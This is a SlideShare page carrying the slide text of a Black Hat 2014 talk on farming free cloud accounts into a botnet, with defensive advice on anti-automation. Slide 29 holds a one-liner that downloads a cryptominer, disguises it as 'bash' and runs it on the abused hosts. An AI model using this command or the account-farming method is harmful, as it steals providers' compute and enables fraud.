InfoSec World 2016 – RFIDiggity – Pentester Guide to Hacking HF/NFC and UHF...
InfoSec World 2016 – RFIDiggity – Pentester Guide to Hacking HF/NFC and UHF... InfoSec World 2016 – RFIDiggity – Pentester Guide to Hacking HF/NFC and UHF...
InfoSec World 2016 – RFIDiggity – Pentester Guide to Hacking HF/NFC and UHF...
 
InfoSec World 2013 – W4 – Using Google to Find Vulnerabilities in Your IT Env...
InfoSec World 2013 – W4 – Using Google to Find Vulnerabilities in Your IT Env...InfoSec World 2013 – W4 – Using Google to Find Vulnerabilities in Your IT Env...
InfoSec World 2013 – W4 – Using Google to Find Vulnerabilities in Your IT Env...
 
DEFCON 20 (2012) – Tenacious Diggity – 29July2012 – Slides.PDF
DEFCON 20 (2012) – Tenacious Diggity – 29July2012 – Slides.PDFDEFCON 20 (2012) – Tenacious Diggity – 29July2012 – Slides.PDF
DEFCON 20 (2012) – Tenacious Diggity – 29July2012 – Slides.PDF
 
SpellCheckV2 Rules
SpellCheckV2 RulesSpellCheckV2 Rules
SpellCheckV2 Rules
 
Smarter Home Invasion With ZigDiggity
Smarter Home Invasion With ZigDiggitySmarter Home Invasion With ZigDiggity
Smarter Home Invasion With ZigDiggity
 
Hacking Exposed EBS Volumes
Hacking Exposed EBS Volumes Hacking Exposed EBS Volumes
Hacking Exposed EBS Volumes
 
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
Ghost in the Browser: Broad-Scale Espionage with Bitsquatting
 
Ferris Bueller’s Guide to Abuse Domain Permutations
Ferris Bueller’s Guide to Abuse Domain PermutationsFerris Bueller’s Guide to Abuse Domain Permutations
Ferris Bueller’s Guide to Abuse Domain Permutations
 
Check Your Privilege (Escalation)
Check Your Privilege (Escalation) Check Your Privilege (Escalation)
Check Your Privilege (Escalation)
 
Introduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation MethodsIntroduction to Linux Privilege Escalation Methods
Introduction to Linux Privilege Escalation Methods
 
Penetration Testing Resource Guide
Penetration Testing Resource Guide Penetration Testing Resource Guide
Penetration Testing Resource Guide
 
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit BasicsNetwork Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
Network Penetration Testing Toolkit - Nmap, Netcat, and Metasploit Basics
 
How Perceptual Analysis Helps Bug Hunters
How Perceptual Analysis Helps Bug HuntersHow Perceptual Analysis Helps Bug Hunters
How Perceptual Analysis Helps Bug Hunters
 
Getting Buzzed on Buzzwords: Using Cloud & Big Data to Pentest at Scale
Getting Buzzed on Buzzwords: Using Cloud & Big Data to Pentest at ScaleGetting Buzzed on Buzzwords: Using Cloud & Big Data to Pentest at Scale
Getting Buzzed on Buzzwords: Using Cloud & Big Data to Pentest at Scale
 
Evolving Cyber Adversary Simulation: How Red Teaming Benefits Organizations
Evolving Cyber Adversary Simulation: How Red Teaming Benefits OrganizationsEvolving Cyber Adversary Simulation: How Red Teaming Benefits Organizations
Evolving Cyber Adversary Simulation: How Red Teaming Benefits Organizations
 
ASU Cybersecurity Symposium - Breaking Into a Career of Breaking In
ASU Cybersecurity Symposium - Breaking Into a Career of Breaking In ASU Cybersecurity Symposium - Breaking Into a Career of Breaking In
ASU Cybersecurity Symposium - Breaking Into a Career of Breaking In
 
CactusCon 2018 - Anatomy of an AppSec Program
CactusCon 2018 - Anatomy of an AppSec Program CactusCon 2018 - Anatomy of an AppSec Program
CactusCon 2018 - Anatomy of an AppSec Program
 
Preparing a Next Generation IT Strategy
Preparing a Next Generation IT StrategyPreparing a Next Generation IT Strategy
Preparing a Next Generation IT Strategy
 
Lord of the Bing: Taking Back Search Engine Hacking From Google and Bing
Lord of the Bing: Taking Back Search Engine Hacking From Google and BingLord of the Bing: Taking Back Search Engine Hacking From Google and Bing
Lord of the Bing: Taking Back Search Engine Hacking From Google and Bing
 

Recently uploaded

Beginner's Guide to Observability@Devoxx PL 2024
Beginner's Guide to Observability@Devoxx PL 2024Beginner's Guide to Observability@Devoxx PL 2024
Beginner's Guide to Observability@Devoxx PL 2024
michniczscribd
 
ppt on the brain chip neuralink.pptx
ppt on the brain chip neuralink.pptxppt on the brain chip neuralink.pptx
ppt on the brain chip neuralink.pptx
Reetu63
 
Software Test Automation - A Comprehensive Guide on Automated Testing.pdf
Software Test Automation - A Comprehensive Guide on Automated Testing.pdfSoftware Test Automation - A Comprehensive Guide on Automated Testing.pdf
Software Test Automation - A Comprehensive Guide on Automated Testing.pdf
kalichargn70th171
 
Superpower Your Apache Kafka Applications Development with Complementary Open...
Superpower Your Apache Kafka Applications Development with Complementary Open...Superpower Your Apache Kafka Applications Development with Complementary Open...
Superpower Your Apache Kafka Applications Development with Complementary Open...
Paul Brebner
 
Unlock the Secrets to Effortless Video Creation with Invideo: Your Ultimate G...
Unlock the Secrets to Effortless Video Creation with Invideo: Your Ultimate G...Unlock the Secrets to Effortless Video Creation with Invideo: Your Ultimate G...
Unlock the Secrets to Effortless Video Creation with Invideo: Your Ultimate G...
The Third Creative Media
 
Going AOT: Everything you need to know about GraalVM for Java applications
Going AOT: Everything you need to know about GraalVM for Java applicationsGoing AOT: Everything you need to know about GraalVM for Java applications
Going AOT: Everything you need to know about GraalVM for Java applications
Alina Yurenko
 
Trailhead Talks_ Journey of an All-Star Ranger .pptx
Trailhead Talks_ Journey of an All-Star Ranger .pptxTrailhead Talks_ Journey of an All-Star Ranger .pptx
Trailhead Talks_ Journey of an All-Star Ranger .pptx
ImtiazBinMohiuddin
 
Operational ease MuleSoft and Salesforce Service Cloud Solution v1.0.pptx
Operational ease MuleSoft and Salesforce Service Cloud Solution v1.0.pptxOperational ease MuleSoft and Salesforce Service Cloud Solution v1.0.pptx
Operational ease MuleSoft and Salesforce Service Cloud Solution v1.0.pptx
sandeepmenon62
 
Why Apache Kafka Clusters Are Like Galaxies (And Other Cosmic Kafka Quandarie...
Why Apache Kafka Clusters Are Like Galaxies (And Other Cosmic Kafka Quandarie...Why Apache Kafka Clusters Are Like Galaxies (And Other Cosmic Kafka Quandarie...
Why Apache Kafka Clusters Are Like Galaxies (And Other Cosmic Kafka Quandarie...
Paul Brebner
 
Best Practices & Tips for a Successful Odoo ERP Implementation
Best Practices & Tips for a Successful Odoo ERP ImplementationBest Practices & Tips for a Successful Odoo ERP Implementation
Best Practices & Tips for a Successful Odoo ERP Implementation
Envertis Software Solutions
 
Strengthening Web Development with CommandBox 6: Seamless Transition and Scal...
Strengthening Web Development with CommandBox 6: Seamless Transition and Scal...Strengthening Web Development with CommandBox 6: Seamless Transition and Scal...
Strengthening Web Development with CommandBox 6: Seamless Transition and Scal...
Ortus Solutions, Corp
 
Ensuring Efficiency and Speed with Practical Solutions for Clinical Operations
Ensuring Efficiency and Speed with Practical Solutions for Clinical OperationsEnsuring Efficiency and Speed with Practical Solutions for Clinical Operations
Ensuring Efficiency and Speed with Practical Solutions for Clinical Operations
OnePlan Solutions
 
42 Ways to Generate Real Estate Leads - Sellxpert
42 Ways to Generate Real Estate Leads - Sellxpert42 Ways to Generate Real Estate Leads - Sellxpert
42 Ways to Generate Real Estate Leads - Sellxpert
vaishalijagtap12
 
Alluxio Webinar | 10x Faster Trino Queries on Your Data Platform
Alluxio Webinar | 10x Faster Trino Queries on Your Data PlatformAlluxio Webinar | 10x Faster Trino Queries on Your Data Platform
Alluxio Webinar | 10x Faster Trino Queries on Your Data Platform
Alluxio, Inc.
 
Call Girls Bangalore🔥7023059433🔥Best Profile Escorts in Bangalore Available 24/7
Call Girls Bangalore🔥7023059433🔥Best Profile Escorts in Bangalore Available 24/7Call Girls Bangalore🔥7023059433🔥Best Profile Escorts in Bangalore Available 24/7
Call Girls Bangalore🔥7023059433🔥Best Profile Escorts in Bangalore Available 24/7
manji sharman06
 
Folding Cheat Sheet #6 - sixth in a series
Folding Cheat Sheet #6 - sixth in a seriesFolding Cheat Sheet #6 - sixth in a series
Folding Cheat Sheet #6 - sixth in a series
Philip Schwarz
 
What’s New in VictoriaLogs - Q2 2024 Update
What’s New in VictoriaLogs - Q2 2024 UpdateWhat’s New in VictoriaLogs - Q2 2024 Update
What’s New in VictoriaLogs - Q2 2024 Update
VictoriaMetrics
 
Migration From CH 1.0 to CH 2.0 and Mule 4.6 & Java 17 Upgrade.pptx
Migration From CH 1.0 to CH 2.0 and Mule 4.6 & Java 17 Upgrade.pptxMigration From CH 1.0 to CH 2.0 and Mule 4.6 & Java 17 Upgrade.pptx
Migration From CH 1.0 to CH 2.0 and Mule 4.6 & Java 17 Upgrade.pptx
ervikas4
 
How GenAI Can Improve Supplier Performance Management.pdf
How GenAI Can Improve Supplier Performance Management.pdfHow GenAI Can Improve Supplier Performance Management.pdf
How GenAI Can Improve Supplier Performance Management.pdf
Zycus
 

Recently uploaded (20)

Beginner's Guide to Observability@Devoxx PL 2024
Beginner's Guide to Observability@Devoxx PL 2024Beginner's Guide to Observability@Devoxx PL 2024
Beginner's Guide to Observability@Devoxx PL 2024
 
ppt on the brain chip neuralink.pptx
ppt on the brain chip neuralink.pptxppt on the brain chip neuralink.pptx
ppt on the brain chip neuralink.pptx
 
Software Test Automation - A Comprehensive Guide on Automated Testing.pdf
Software Test Automation - A Comprehensive Guide on Automated Testing.pdfSoftware Test Automation - A Comprehensive Guide on Automated Testing.pdf
Software Test Automation - A Comprehensive Guide on Automated Testing.pdf
 
Superpower Your Apache Kafka Applications Development with Complementary Open...
Superpower Your Apache Kafka Applications Development with Complementary Open...Superpower Your Apache Kafka Applications Development with Complementary Open...
Superpower Your Apache Kafka Applications Development with Complementary Open...
 
Unlock the Secrets to Effortless Video Creation with Invideo: Your Ultimate G...
Unlock the Secrets to Effortless Video Creation with Invideo: Your Ultimate G...Unlock the Secrets to Effortless Video Creation with Invideo: Your Ultimate G...
Unlock the Secrets to Effortless Video Creation with Invideo: Your Ultimate G...
 
Going AOT: Everything you need to know about GraalVM for Java applications
Going AOT: Everything you need to know about GraalVM for Java applicationsGoing AOT: Everything you need to know about GraalVM for Java applications
Going AOT: Everything you need to know about GraalVM for Java applications
 
Trailhead Talks_ Journey of an All-Star Ranger .pptx
Trailhead Talks_ Journey of an All-Star Ranger .pptxTrailhead Talks_ Journey of an All-Star Ranger .pptx
Trailhead Talks_ Journey of an All-Star Ranger .pptx
 
Operational ease MuleSoft and Salesforce Service Cloud Solution v1.0.pptx
Operational ease MuleSoft and Salesforce Service Cloud Solution v1.0.pptxOperational ease MuleSoft and Salesforce Service Cloud Solution v1.0.pptx
Operational ease MuleSoft and Salesforce Service Cloud Solution v1.0.pptx
 
Why Apache Kafka Clusters Are Like Galaxies (And Other Cosmic Kafka Quandarie...
Why Apache Kafka Clusters Are Like Galaxies (And Other Cosmic Kafka Quandarie...Why Apache Kafka Clusters Are Like Galaxies (And Other Cosmic Kafka Quandarie...
Why Apache Kafka Clusters Are Like Galaxies (And Other Cosmic Kafka Quandarie...
 
Best Practices & Tips for a Successful Odoo ERP Implementation
Best Practices & Tips for a Successful Odoo ERP ImplementationBest Practices & Tips for a Successful Odoo ERP Implementation
Best Practices & Tips for a Successful Odoo ERP Implementation
 
Strengthening Web Development with CommandBox 6: Seamless Transition and Scal...
Strengthening Web Development with CommandBox 6: Seamless Transition and Scal...Strengthening Web Development with CommandBox 6: Seamless Transition and Scal...
Strengthening Web Development with CommandBox 6: Seamless Transition and Scal...
 
Ensuring Efficiency and Speed with Practical Solutions for Clinical Operations
Ensuring Efficiency and Speed with Practical Solutions for Clinical OperationsEnsuring Efficiency and Speed with Practical Solutions for Clinical Operations
Ensuring Efficiency and Speed with Practical Solutions for Clinical Operations
 
42 Ways to Generate Real Estate Leads - Sellxpert
42 Ways to Generate Real Estate Leads - Sellxpert42 Ways to Generate Real Estate Leads - Sellxpert
42 Ways to Generate Real Estate Leads - Sellxpert
 
Alluxio Webinar | 10x Faster Trino Queries on Your Data Platform
Alluxio Webinar | 10x Faster Trino Queries on Your Data PlatformAlluxio Webinar | 10x Faster Trino Queries on Your Data Platform
Alluxio Webinar | 10x Faster Trino Queries on Your Data Platform
 
bgiolcb
bgiolcbbgiolcb
bgiolcb
 
Call Girls Bangalore🔥7023059433🔥Best Profile Escorts in Bangalore Available 24/7
Call Girls Bangalore🔥7023059433🔥Best Profile Escorts in Bangalore Available 24/7Call Girls Bangalore🔥7023059433🔥Best Profile Escorts in Bangalore Available 24/7
Call Girls Bangalore🔥7023059433🔥Best Profile Escorts in Bangalore Available 24/7
 
Folding Cheat Sheet #6 - sixth in a series
Folding Cheat Sheet #6 - sixth in a seriesFolding Cheat Sheet #6 - sixth in a series
Folding Cheat Sheet #6 - sixth in a series
 
What’s New in VictoriaLogs - Q2 2024 Update
What’s New in VictoriaLogs - Q2 2024 UpdateWhat’s New in VictoriaLogs - Q2 2024 Update
What’s New in VictoriaLogs - Q2 2024 Update
 
Migration From CH 1.0 to CH 2.0 and Mule 4.6 & Java 17 Upgrade.pptx
Migration From CH 1.0 to CH 2.0 and Mule 4.6 & Java 17 Upgrade.pptxMigration From CH 1.0 to CH 2.0 and Mule 4.6 & Java 17 Upgrade.pptx
Migration From CH 1.0 to CH 2.0 and Mule 4.6 & Java 17 Upgrade.pptx
 
How GenAI Can Improve Supplier Performance Management.pdf
How GenAI Can Improve Supplier Performance Management.pdfHow GenAI Can Improve Supplier Performance Management.pdf
How GenAI Can Improve Supplier Performance Management.pdf
 

Black Hat USA - CloudBots Harvesting Crypto Coins Like a Botnet Farmer

  • 1. CloudBots: Harvesting Crypto Coins Like a Botnet Farmer 2014 August 6
  • 2. 2 Main Topics • Could we build a botnet from freely available cloud services? • Will we see the rise of more cloud based botnets? • Should insufficient anti-automation be considered a top ten vulnerability? What are these guys talking about? Overview
  • 3. 3 Platform as a Service Cloud PaaS
  • 4. 4 Platform as a Service Free Cloud Services <Insert with other providers later> Reference: http://goo.gl/AZ4nYp
  • 5. 5 Development Environment as a Service Free Cloud Services
  • 7. 7 Automating Registration • Hurdles - Email address confirmation - CAPTCHA - Phone/SMS - Credit Card Usability vs Security Cloud Providers (In)Security
  • 8. 8 Anti-Automation Fraudulent Account Registration More Anti-Automation Email Confirmation Only 66% 33% EMAIL CAPTCHA CREDIT CARD PHONE
  • 9. 9 Anti-Automation Techniques • Email address confirmation • CAPTCHA • Phone/SMS • Credit Card Usability vs Security Cloud Providers (In)Security
  • 10. 10 Automated email processing - Wildcard localpart *@domain.com - Extract important information from incoming emails - Grep for confirmation token links and request them Account registration - Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing
  • 12. 12 Using the Google AppEngine InboundMailHandler - first.last.001@cloudbotmail.appspotmail.com - first.last.002@cloudbotmail.appspotmail.com - first.last.003@cloudbotmail.appspotmail.com - first.last.004@cloudbotmail.appspotmail.com - first.last.005@cloudbotmail.appspotmail.com - first.last.006@cloudbotmail.appspotmail.com - first.last.007@cloudbotmail.appspotmail.com - first.last.008@cloudbotmail.appspotmail.com - first.last.009@cloudbotmail.appspotmail.com - first.last.010@cloudbotmail.appspotmail.com Google App Engine Detection issues
  • 13. 13 Unlimited usernames - Prevent pattern recognition - Pull from real world examples [local-part from dump]@domain.tld Realistic Randomness Real Email Addresses
  • 14. 14 Unlimited domains - freedns.afraid.org - Prevent detection - Thousands of unique email domains SMTP Services Plethora of Email Addresses
  • 16. 16 What do we need? • Free email relay - Free MX registration • Process wildcards - *@domain.tld • Send unlimited messages - Unrestricted STMP to HTTP POST/JSON requests Free Signups Receiving Email and Processing
  • 17. 17 Inbound Mail As A Service Free Cloud Services <Insert with other providers later> Reference: http://goo.gl/yqoh6U
  • 18. 18 Automated email processing - Extract important information from incoming emails - Grep for confirmation token links and request them Account registration - Automatic request sent to account activation links SMTP Services Email Confirmation Token Processing Reference: http://bishopfox.github.io/anti-anti-automation/
  • 19. 19 <Insert wall of random email addresses> Realistic Randomness Unique Email Addresses Avoid Pattern Recognition
  • 22. 22 MongoDB • MongoLab • MongoHQ Keeping track of all accounts Storing Account Information
  • 24. 24 What can we do? • Distributed Network Scanning • Distributed Password Cracking • DDoS • Click-fraud • Crypto Currency Mining • Data Storage Now we have a botnet! Fun! Botnet Activities
  • 27. 27 What are we using? • Fabric - Fabric is a Python library and command- line tool for streamlining the use of SSH for application deployment or systems administration tasks. • fab check_hosts –P –z 20 • fab run_command Botnet C2 Command & Control
  • 28. 28 Unique Amazon IP Addresses Distributed Command [na1.cloudbox.net:2352]: curl http://icanhazip.com 4.109.182.13 [eu1.cloudbox.net:3127]: curl http://icanhazip.com 126.34.56.254 [na1.cloudbox.net:10660]: curl http://icanhazip.com 58.251.42.128 [na1.cloudbox.net:15627]: curl http://icanhazip.com 74.216.236.72 [na1.cloudbox.net:8000]: curl http://icanhazip.com 28.228.253.19 [na1.cloudbox.net:4028]: curl http://icanhazip.com 64.216.37.252
  • 29. 29 Make money, money • Deploying miners • One command for $$$ All your processors are belong to us Litecoin Mining if [ ! -f bash ]; then wget http://sourceforge.net/projects/cpuminer/files/pooler-cpuminer- 2.3.2-linux-x86_64.tar.gz && tar zxfv pooler-cpuminer-2.3.2- linux-x86_64.tar.gz && rm pooler-cpuminer-2.3.2-linux- x86_64.tar.gz && mv minerd bash; fi; screen ./bash – url=stratum+tcp://pool.mine-litecoin.com --userpass=ninja.47:47; rm bash
  • 30. 30 Load After Crypto Currency Mining Distributed Command ID | Host | Status ---------------------------------------- 0 | na1.cloudbox.net:1678 | 2 users, load average: 37.08, 37.60, 32.51 1 | na1.cloudbox.net:15121| 1 user, load average: 16.35, 15.35, 12.00 2 | na1.cloudbox.net:11631| 1 user, load average: 19.65, 18.46, 14.38 3 | na1.cloudbox.net:4358 | 2 users, load average: 23.10, 22.91, 18.95 4 | na1.cloudbox.net:1212 | 1 user, load average: 19.60, 18.47, 14.41 5 | na1.cloudbox.net:5841 | 1 user, load average: 19.97, 18.61, 14.52 6 | eu1.cloudbox.net:3025 | 1 user, load average: 19.27, 18.37, 14.33 7 | eu1.cloudbox.net:6892 | 2 users, load average: 19.65, 18.46, 14.38 8 | eu1.cloudbox.net:2038 | 1 user, load average: 18.85, 17.43, 13.45 9 | na1.cloudbox.net:5235 | 1 user, load average: 18.55, 17.32, 13.38 10 | na1.cloudbox.net:1122 | 1 user, load average: 26.04, 25.57, 20.02
  • 31. 31 All your processors are belong to us Litecoin Mining
  • 33. DETECTION No one can catch a ninja!
  • 34. 34 Automatic Backups • Propagate to other similar services - e.g. MongoLab   MongoHQ • Infrastructure across multiple service providers • Easily migrated Armadillo Up ™ Disaster Recovery Plan
  • 39. 39 Crypto Coins & DDoS Clouds Under Siege
  • 40. 40 Crypto Coins & DDoS Clouds Under Siege
  • 42. 42 What can we do? • Logic puzzles • Sound output • Credit card validation • Live operators • Limited-use account • Heuristic checks • Federated identity systems Usability vs Security Protection Reference: http://www.w3.org/TR/2003/WD-turingtest-20031105/#solutions
  • 43. 43 What should we do? • Analyzing properties of Sybil accounts • Analyzing the arrival rate and distribution of accounts • Flag accounts registered with emails from newly registered domain names • Email verification • CAPTCHAs • IP Blacklisting • Phone/SMS verification • Automatic pattern recognition At Abuse vs At Registration Protection Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 44. 44 At Abuse vs At Registration Protection Advanced techniques • Signup flow events - Detect common activities after signup • User-agent - A registration bot may generate a different user-agent for each signup or use uncommon user-agents • Form submission timing - A bot that doesn't mimic human behavior by performing certain actions too quickly can be detected Reference: https://www.usenix.org/system/files/conference/usenixsecurity13/sec13-paper_thomas.pdf
  • 45. THANK YOU Oscar Salazar @tracertea Rob Ragan @sweepthatleg CONTACT@BISHOPFOX.COM